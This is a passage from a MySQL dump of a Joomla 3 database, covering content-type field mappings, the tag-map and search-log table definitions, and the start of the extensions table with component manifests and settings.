{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(9,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10000,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10001,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10002,'Banner Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(10003,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10004,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'); /*!40000 ALTER TABLE `fit_content_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_contentitem_tag_map` -- DROP TABLE IF EXISTS `fit_contentitem_tag_map`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_contentitem_tag_map` ( `type_alias` varchar(255) NOT NULL default '', `core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table', `content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table', `tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table', `tag_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item', `type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table', UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`), KEY `idx_tag_type` (`tag_id`,`type_id`), KEY `idx_date_id` (`tag_date`,`tag_id`), KEY `idx_tag` (`tag_id`), KEY `idx_type` (`type_id`), KEY `idx_core_content_id` (`core_content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps items from content tables to tags'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_contentitem_tag_map` -- LOCK TABLES `fit_contentitem_tag_map` WRITE; /*!40000 ALTER TABLE `fit_contentitem_tag_map` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_contentitem_tag_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_core_log_searches` -- DROP TABLE IF EXISTS `fit_core_log_searches`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_core_log_searches` ( `search_term` varchar(128) NOT NULL default '', `hits` int(10) unsigned NOT NULL default '0' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_core_log_searches` -- LOCK TABLES `fit_core_log_searches` WRITE; /*!40000 ALTER TABLE `fit_core_log_searches` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_core_log_searches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_extensions` -- DROP TABLE IF EXISTS `fit_extensions`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_extensions` ( `extension_id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL, `type` varchar(20) NOT NULL, `element` varchar(100) NOT NULL, `folder` varchar(100) NOT NULL, `client_id` tinyint(3) NOT NULL, `enabled` tinyint(3) NOT NULL default '1', `access` int(10) unsigned default NULL, `protected` tinyint(3) NOT NULL default '0', `manifest_cache` text NOT NULL, `params` text NOT NULL, `custom_data` text NOT NULL, `system_data` text NOT NULL, `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) default '0', `state` int(11) default '0', PRIMARY KEY (`extension_id`), KEY `element_clientid` (`element`,`client_id`), KEY `element_folder_clientid` (`element`,`folder`,`client_id`), KEY `extension` (`type`,`element`,`folder`,`client_id`) ) ENGINE=InnoDB AUTO_INCREMENT=10141 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_extensions` -- LOCK TABLES `fit_extensions` WRITE; /*!40000 ALTER TABLE `fit_extensions` DISABLE KEYS */; INSERT INTO `fit_extensions` VALUES (1,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"Unknown\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2008 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','{\"contact_layout\":\"_:default\",\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"plain\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"category_layout\":\"_:default\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"0\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_items\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_items_cat\":\"1\",\"show_pagination_limit\":\"1\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"initial_sort\":\"ordering\",\"captcha\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_feed_link\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(9,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{\"cachetimeout\":\"6\"}','','',0,'0000-00-00 00:00:00',0,0),(11,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"en-GB\",\"site\":\"en-GB\"}','','',0,'0000-00-00 00:00:00',0,0),(12,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\",\"enable_flash\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(14,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(15,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(17,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(19,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights 